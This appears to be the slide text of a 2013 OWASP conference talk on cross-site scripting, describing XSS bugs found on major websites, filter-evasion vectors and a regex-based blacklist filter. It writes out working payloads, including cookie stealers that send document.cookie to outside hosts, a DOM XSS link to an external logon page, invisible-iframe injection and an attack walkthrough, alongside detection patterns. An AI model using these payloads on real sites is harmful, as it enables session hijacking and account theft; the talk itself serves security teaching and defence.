Cross-Site Scripting (XSS): My Love

Where is Secure CODE?


A talk by Ashar Javed

@

OWASP Seminar (RSA Europe 2013)

28-10-2013, Amsterdam


WHO AM I?

  • a researcher in Ruhr-University Bochum, RUB, Germany

  • a student working towards his PhD

  • an XSSer

  • Listed in almost every Hall of Fame pages

@Soaj1664ashar

WhY I love XSS?

Reason # 1

reason # 2


REASON # 3


I often dream about a world without XSS


Friend's Reaction on reason #3!

Agenda


  • Cross-Site Scripting (XSS)
  • Identification of Potential XSS Venues
  • my XSS Filter
  • Conclusion

What is XSS?



"An XSS attack occurs when a script from an untrusted source is executed in rendering a page" [*]

Is Consensus on XSS Definition?



http://drops.dagstuhl.de/opus/volltexte/2013/3905/pdf/dagrep_v002_i010_p001_s12401.pdf

XSS according to OWASP



"Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites"



https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)


Some STATISTICS ABOUT XSS

  According to White-hat Security, 53% of web applications have XSS vulnerability [*]

                                                                                                                                      [*] https://www.whitehatsec.com/assets/WPstatsReport_052013.pdf






                                                                                                                                    


Some STATISTICS ABOUT XSS ...


According to Google Vulnerability Reward Program's Statistics, XSS is the most reported issue [*]

[*] http://www.nilsjuenemann.de/2012/12/news-about-googles-vulnerability-reward.html

Some STATISTICS ABOUT XSS ...


According to OWASP Top 10, 2013,  XSS is at #3 [*]

                                                                        [*] https://www.owasp.org/index.php/Top_10_2013-Table_of_Contents


Some STATISTICS ABOUT XSS ...


According to "Open Sourced Vulnerability Database" (http://www.osvdb.org/osvdb/show_graph/1)

Trustwave global security report


(http://blog.spiderlabs.com/2013/08/the-web-is-vulnerable-xss-on-the-battlefront-part-1.html)

What about Mobile WEB?


Mobile web-sites often starts with a letter "m" or ends in a word "mobi" or "mobile" e.g., http://m.pinterest.com/ or http://m.slashdot.org/ or http://www.jobmail.co.za/mobile/

some facts about mobile web from our survey of 100 sites

69% less HTML code as compare to their desktop variants.

We found JavaScript on 79 sites while only 1 mobile site is using Modernizr (JavaScript library) 

XSS on Mobile-web


81 out of 100 popular mobile-sites are vulnerable to XSS!


Our research paper is available at: http://www.nds.rub.de/media/nds/veroeffentlichungen/2013/11/24/lniguide.pdf

HP 2012 Cyber risks report (Top 10 Mobile vulnerabilities)

http://www.hpenterprisesecurity.com/collateral/whitepaper/

HP2012CyberRiskReport_0213.pdf



OWASP Top 10 for Mobiles


https://www.owasp.org/index.php/OWASP_Mobile_Security

_Project#tab=Top_Ten_Mobile_Risks

In short

why you should care about XSS?



Getting Bored ...

Now real ...


Example # 1 (<, "" & > are filtered)

This is one of the Top 20 sites according to latest Alexa rank!


Example # 1 ---


"><img src=x onerror=prompt(1);>

becomes

<input id="query" value="  img src=x onerror=prompt(1); " name="query" title="Enter a keyword or topic" class="dText" aria-haspopup="true" type="text">

Is XSS Possible?

Here it is ...


How?

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">

                                                         becomes

<input id="query" value="'" marquee="" img="" src="x" onerror="confirm(1)" "="" plaintext\="" |\="" plaintext="" onmouseover="prompt(1)" prompt(1)="" @gmail.com="" isindex="" formaction=":alert(/XSS/)" '--="" alert(1)="" name="query" title="Enter a keyword or topic" class="dText" aria-haspopup="true" type="text">


importance of previous Xss vector

Example # 2

On-demand software as a service (SaaS) learning management system.

< becomes &lt;

> becomes &gt;

" becomes &quot;

e.g.,

"><img src=x onerror=confirm(1);>

convert into

&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;

Can you xss this?


Here it is

interesting FIX

Example # 3


A well known website i.e.,  http://www.slideshare.net

60 million monthly visitors

130 million page-views

As far as I can see, site is pretty-much secure & our favorite vector ...

"><img src=x onerror=prompt(1);>

becomes

">&lt;img src="x">


Another try

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">

becomes

Example # 3...

Here It is ...


How?

My Facebook Profile...

Don't Forgot!

Example # 4


Facebook: Biggest Social Network with more than 1 billion user-base!


Bug Bounty Program: https://www.facebook.com/whitehat


So far Facebook has payed more than 1 million dollars in the form of bug bounty reward: https://www.facebook.com/notes/facebook-security/recent-reports-on-our-whitehat-program/10151538365500766


Trusted friend attack: when Guardian angels strike


Hack In The Box, ,Kuala Lumpur: Malaysia 2013

http://conference.hitb.org/hitbsecconf2013kul/ashar-javed/

DeepSec, Vienna Austria 2013

https://deepsec.net/speaker.html#PSLOT110

But here we only talk about XSS...

How?

Example # 5


Do you know the guy who was able to XSS every "Security & Protection" pages of PAYPAL?

Here is the answer :)


SNAP-SHOT of EMAILS ...

#1

#2

#3

#4 to #25 DOM XSSes ...

Root Cause ...

e.g., https://www.paypal.com/us/webapps/mpp/security/what-is-phishing#recognizing_phishing
https://www.paypal.com/us/webapps/mpp/security/what-is-phishing#legitimate_paypal_emails

Root Cause In this case...


JavaScript controls the location/URL to be displayed in an insecure manner.

DOM objects' references that may be controlled by the attacker should be checked.

Excerts from ""JavaScript Libraries (In)security"" talk by @WisecWisec at OWASP AppSec Research EU 2013 





unsafe jquery methods (http://twitpic.com/95n3ak)





DOM XSS exploit

https://www.paypal.com/us/webapps/mpp/security/email-authentication/#"><img src=x onerror=window.open('http://83.140.109.66/x528x582/logon.html');>

Example # 6


My all-time favorite "Twitter"


Tip: Follow cool people on Twitter & you will learn a lot! 


Twitter takes SECURITY seriously and on their mobile side they have started using Content Security Policy (CSP)!

DOM XSS in Twitter Translation


short story

Reflective XSS in Twitter Translation

Example # 7


Microsoft!


I wish they will start a bug bounty program for their web applications ! :)

Reflective XSS in hotmail

May 2012-May 2013 (1 year of reporting vulnerabilities to Microsoft)

DOM XSS in Rediscover.MSN.COM

DOM XSS in REALESTATE.MSN.COM

DOM XSS in Latino.MSN.com

Example # 8


You often see a URL like:


https://www.magentocommerce.com/products/customer

/account/login/?back_url=http://www.magentocommerce.com/boards/

member/messages/view_folder/1/

In the wild, following parameters are very common e.g.,

return-url, ReturnUrl, continue & return_url


Developers forgot to validate  ...

Example # 9


Third-party RICH-TEXT editors, Ticketing functionality, Ask question from Support Teams, Developers' forums, Send Private Message feature & Ask a Question on a Forum etc ...


ALL PROVIDE AN OPTION TO ATTACH A FILE


Often leads to Arbitrary File Upload Vulnerability :-(

Example taken from developers' forum

See Allowed FILE TYPES


POC (X.COM)

POC (Paypal Technical merchant support https://ppmts.custhelp.com/)

What is inside FLASH FILE?

XSS Vector

Session Cookie Stealer # 1 (116 char, requires user-interaction)

<a href="javascript:img=new Image();img.src='http://xssplayground.net23.net/xsstest.php?c=='+document.cookie;">X</a>

http://jsfiddle.net/mqXLB/

Session Cookie Stealer # 2 (103 chars & Doesn't requires user interaction)

"><img src=x onerror=document.location='http://xssplayground.net23.net/xsstest.php?c='+document.cookie>


http://jsfiddle.net/yDutM/

Session Cookie Stealer # 3 (66 chars & Doesn't requires user interaction)


"><svg/onload=window.location='//goo.gl/F7Kb1?c='+document.cookie>


http://jsfiddle.net/pzW9m/

Session Cookie Stealer # 4 (50 chars & Doesn't requires user interaction)


"><svg/onload=location='//goo.gl/F7Kb1?c='+cookie>


http://jsfiddle.net/pzW9m/1/

Can we further shorten this vector?

But I was wrong :-(

Here is 36 chars vector by "Mario Heiderich" with no user-interaction!


<iframe/onload=src='//x.se/'+cookie>



Recommendation

Example # 10


All "meme" images have been taken from "Google Image Search"

So now what are you expecting  on the next slide :-)

XSS in Google Image search ($1337)

Background

Root cause: "Scrapping"

I made a Google Image search with the following input:

"><img src=x onerror=alert(11111111111);>

but got the following alert box ...


Analysis


Another POC

Example # 11

This is one of the Top 20 sites according to latest Alexa rank.


For Logged-in users, site allows to create an HTML page about YOURSELF!


On Server side, site has JavaScript Detection Program in place and if page has "JavaScript", site doesn't allow to proceed.

JavaScript detected

"><img src=x onerror=prompt(1);>

<iframe/src=//goo.gl/nlX0P>

<script src='https://dl.dropbox.com/u/13018058/js.js'></script>

Not bad

This is how admin thinks...

Challenge...

bypass # 1


<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

Bypass # 2

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

Bypass # 3 (IE Specific, vbscript)

<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(88)&chr(83)&chr(83)))


Bypass # 4 (Opera Specific)


<svg><script>alert&#40 1&#41

Bypass # 5

<embed/src=//goo.gl/nlX0P>

<object/data=//goo.gl/nlX0P>


Bypass # 6 to Infinite 

No Time :-(

isn't it cool :-)

EXAMPLE # 12 (potential xss house if "username" field is present)


Log-in/Registration Forms 


+


Forgot your password

XSS in MailCHIMP in log-in form (alexa rank: 309)


XSS in megashares in log-in form

XSS in wunderground registration form (alexa rank 646)

"Forgot your password" is the most forgotten feature & often poorly implemented

XSS in New york Times (password reset)


XSS in letitbit (password reset, alexa rank 695)

XSS in wordstream (forgot your password)

XSS in in.com password reset feature


Impact of XSS in in.com password reset functionality

poorly implemented "forgot your password"

Another form of poor implementation...


In case, if attacker is unable to found an XSS in password reset feature then with 90% PROBABILTY the following thing is allowed  & admin will have a good scary time :-)


Send password reset email to

admin@sitename.com



Example # 13


Yahoo (Upcoming Bounty Program)

what I did so far ...



Stored XSS in Yahoo Email box


Story


Change "Sending Name" to an XSS vector :)






story CONTINUES


Reflective XSS in yahoo email box


Were Able to broke their one of the important product's XSS Filter





how

"><img src=x onerror=confirm(1);>

becomes


soon I realize


What will happen if I will encode the vector in Hex encoded form i.e.,

"><img src=x onerror=confirm(1);>

in HEX form is:

&#x22;&#x3E;&#x3C;&#x69;&#x6D;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x78;
&#x20;&#x6F;&#x6E;&#x65;&#x72;&#x72;&#x6F;&#x72;&#x3D;&#x63;&#x6F;&#x6E;
&#x66;&#x69;&#x72;&#x6D;&#x28;&#x31;&#x29;&#x3B;&#x3E;

here you go




I forgot about Mobile web :-)


I am not going to show you 81 alert/confirm/prompt boxes ...


But I am going to show you LIVE BUT HARMLESS XSS exploit :)


CRICBUZZ, Alexa Rank 2675 (http://m.cricbuzz.com/info/contact)

Attacker knows Site has An XSS

Attacker's Goal (steal session cookie of victim)

STEPS ATTACKER WILL FOLLOW


Prepare the form with XSS PAYLOAD

Construct a web page with form + PAYLOAD

Trick victim to visit attacker's web page

Attacker has the session cookie of the victim



Prepare form with payload

Attacker's page

http://xssplayground.net23.net/victim.html

xssforfunandlearn.host22.com/victim_demo.html 

Easiest way to trick victim

<a href="http://xssplayground.net23.net/victim.html"><img src="http://images.sodahead.com/polls/003286393/

250227838_18_answer_1_xlarge.jpeg"></a>

Game over

Another way to exploit xss


@RSnake Interview With A Blackhat (Part 1 & Part 2)

https://blog.whitehatsec.com/interview-with-a-blackhat-part-1/#.Uirp6sazfzF


Some points from interview


goal is to insert an invisible iframe


"><iframe src='http://www.bbc.co.uk/news/' frameborder='0' width='1' height='1'>

Target is

http://www.care2.com/ (Alexa Rank, 2684)


send victim a link & auto-submit the search form

xssplayground.net23.net/victim2.html


POC screen-shots



here it is an iframe

Yet Another XSS exploit i.e., Defacement


153,958 defacements have been archived here: https://www.zone-h.org/archive/special=1


defacement attack vectors

 

result of defacement

my XSS FILTER


  • Regular Expression Based
  • Black-list Approach
  • Light-weight & Flexible
  • Minimum effort from the Developer
  • Low run time overhead, if deployed
  • In the form of JavaScript Function

background




http://dl.acm.org/citation.cfm?id=1368112

published in 30th ICSE 2008


stop_xss function

1st Regular expression (RE) from STOP_XSS function


/<script[^>]*>.*?<\/script>/




DEMO of 1st re (/<script[^>]*>.*?<\/script>/)

http://jsfiddle.net/dgJta/1/

XSS Attack Vector: <script src="https://dl.dropbox.com/u/13018058/js.js"></script>

Another DEMO of 1st re (/<script[^>]*>.*?<\/script>/)

http://jsfiddle.net/Z9Y6m/1/

XSS attack vector: <script>confirm(document.cookie)<\/script>

sounds good!


limitations of 1st re



Demo: http://jsfiddle.net/adz8t/

Limitations of 1st RE (no obfuscation support)

http://pastebin.com/a4WSVDzf

our improved form of 1st RE


/<script[^>]*>.*?<\/script>/


has been changed into


/<script[^>]*>[\s\S]*?/ 

. (dot) becomes [\s\S]

Closing "script" tag gone

Our improved form of 1st re


/<script[^>]*>[\s\S]*?/ 



obfuscation support (URL, Decimal

&  HEX encoding | #2nd, 3rd & 4th RE)


2nd Regular expression (RE) from STOP_XSS function


/([\s"']+on\w+)\s*=/

DEMO of 2nd re

/([\s"']+on\w+)\s*=/

http://jsfiddle.net/MQLGb/

XSS attack vector: <body onload="alert(1)">

Another DEMO of 2nd re

/([\s"']+on\w+)\s*=/

http://jsfiddle.net/wZW4w/1/

XSS attack vector: <img src="x"onerror =alert(1)>

Yet Another DEMO of 2nd re

/([\s"']+on\w+)\s*=/

http://jsfiddle.net/QhwK2/2/

XSS attack vector: <img/src=x /alt='Img Not Found'onerror=confirm(1)>

sounds cool!

limitations of 2nd re

Our improved form of 2nd re (#5 re)

/[\s"\'`;\/0-9\=\x0B\x09\x0C\x3B\x2C\x28]+on\w+[\s\x0B\x09\x0C\x3B\x2C\x28]*=/

valid separators in different browsers

https://twitter.com/kinugawamasato


ref: https://zdresearch.com/zdresearch-xss1-challenge-writeup/

valid separators in different browsers

https://twitter.com/LightOS


ref: http://websec.ca/kb/sql_injection#MySQL_Fuzzing_Obfuscation

3rd Regular expression (RE) from STOP_XSS function

/(=|(U\s*R\s*L\s*\())\s*("|\')?[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/



DEMO of 3rd re

/(=|(U\s*R\s*L\s*\())\s*("|\')?[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/

http://jsfiddle.net/w2L3z/

XSS attack vector:

<p style="background:url(javascript:alert(1))">

Another DEMO of 3rd re

/(=|(U\s*R\s*L\s*\())\s*("|\')?[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/

http://jsfiddle.net/4F2Gh/

XSS attack vector: <iframe src="jaVAscRipT:alert(1)">


nice!

limitations of 3rd re


Our improved form of 3rd re (#6th)

/(?:=|U\s*R\s*L\s*\()\s*[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/


Our improved form of 3rd re (added re for &colon;) | #7th RE

/&colon;/


colon hurts :)

#8th RE

/<embed[^>]*>[\s\S]*?/


e.g.,

<embed/src=//goo.gl/nlX0P>

#9th RE

/<object[^>]*>[\s\S]*?/


e.g.,

<object/data=//goo.gl/nlX0P>



#10th RE

/<isindex[^>]*>[\s\S]*?/


e.g.,

<isindex action=//goo.gl/nlX0P type=image>


#11th re

/<form[^>]*>[\s\S]*?/


e.g.,

<form action=//goo.gl/nlX0P><input type="submit">


#12th RE

/<meta[^>]*>[\s\S]*?/


e.g.,

<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">



#13th RE

/<style[^>]*>[\s\S]*?/

e.g., in IE7

<style>#test{x:expression(alert(/XSS/))}</style>
<body><div id="test">X</div></body>


#14th RE

/<applet[^>]*>[\s\S]*?/


e.g., Old Firefox
<applet code="javascript:confirm(document.cookie);">


#15th RE

/[\s\S]data:text\/html[\s\S]/


e.g.,
<iframe/src="data:text/html,<iframe/src=http://jsfiddle.net/d7Xu7/1/>">

#16th RE

/[\s\S]xlink:href[\s\S]/


e.g., In Firefox

<math><a xlink:href="//goo.gl/nlX0P">click

#17th RE

/[\s\S]base64[\s\S]/


e.g.,
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

#18th RE

/[\s\S]style[\s\S]/


e.g., IE7
<div style="color:rgb(''&#0;x:expression(alert(1))"></div>

ref:
https://twitter.com/XSSVector/status/219173943087599616

#19th RE

/[\s\S]formaction[\s\S]/


e.g.,
<form><input type="image" value="submit" formaction=//goo.gl/nlX0P>

#20th RE

/[\s\S]src[\s\S]/


e.g.,

<iframe src=//goo.gl/nlX0P>

#21th RE

/[\s\S]href[\s\S]/


e.g.,
<a/href=//goo.gl/nlX0P>X</a>
<a/href="j&Tab;av&NewLine;ascript:\u0061lert&lpar;1&rpar;"><input type="submit">

#22nd to 26th RE

/[\s\S]xmlns[\s\S]/
/[\s\S]xhtml[\s\S]/
/[\s\S]@import[\s\S]/
/[\s\S]!ENTITY.*?SYSTEM[\s\S]/
/[\s\S]pattern(?=.*?=)[\s\S]/

See http://html5sec.org/

by

https://twitter.com/0x6D6172696F

for example vectors of each category!


Testing

challenge (community feedback)

http://xssplayground.net23.net/xssfilter.html


How much vectors i received?

more than 10K XSS vectors recorded

(SNAPSHOT)


what about bypasses?


ONLY 3 TYPES of Bypasses


The main reasons are:


  • Regular Expression for FORM tag Missing
  • Regular Expression for ISINDEX tag Missing
  • IE9 Specific bypass due to its crazy IMPLEMENTATION :)

winners

https://twitter.com/soaj1664ashar/status/324153228713422849


write-up here: http://pastebin.com/AxYbnufM

IE9 is awesome :-)


In IE9, vertical tab i.e., \u0B can be used an alternative to SPACE separator/character.

e.g., (http://jsfiddle.net/wzG2M/2/)

Credits: Alex (https://twitter.com/insertScript)

\u0B in action



one step further ...

http://jsfiddle.net/Y2cWH/



but why only male symbol? :-)




Where is FEMALE symbolic representation? e.g.,


here it is! (\u0c in action)

http://jsfiddle.net/JWEAs/



\u0C === Form feed

one step further

http://jsfiddle.net/GTxVt/



final fuzz


https://twitter.com/soaj1664ashar/status/358574268386246656

Evaluation (effort + performance)

We have added support of XSS filter in WordPress & Drupal




redos (regular expression denial of service attack) benchmark

research impact

(https://twitter.com/ModSecurity/status/281485539574685696)

modsecurity challenge

Cross-site Scripting (XSS) Evasion Challenge

http://www.modsecurity.org/demo/demo-deny-noescape.html

Modsecurity challenge results


http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html

Before Conclusion


All Your PHP-Based Cross-Site Scripting Protection Mechanisms are Belong to Us :)

Conclusion

XSS is unavoidable at least nowadays!


Now its your job to raise the bar for attacker.  


At least test your site against OWASP XSS filter evasion cheat sheet + http://pastebin.com/u6FY1xDA


I think and believe that XSS SOLUTION SHOULD BE IN THE FORM OF LAYERS  & Content Security Policy (CSP) should be one layer!





thanks!


Cross-Site Scripting: My Love

By Yogesh Sharma

Cross-Site Scripting: My Love

  • 1,513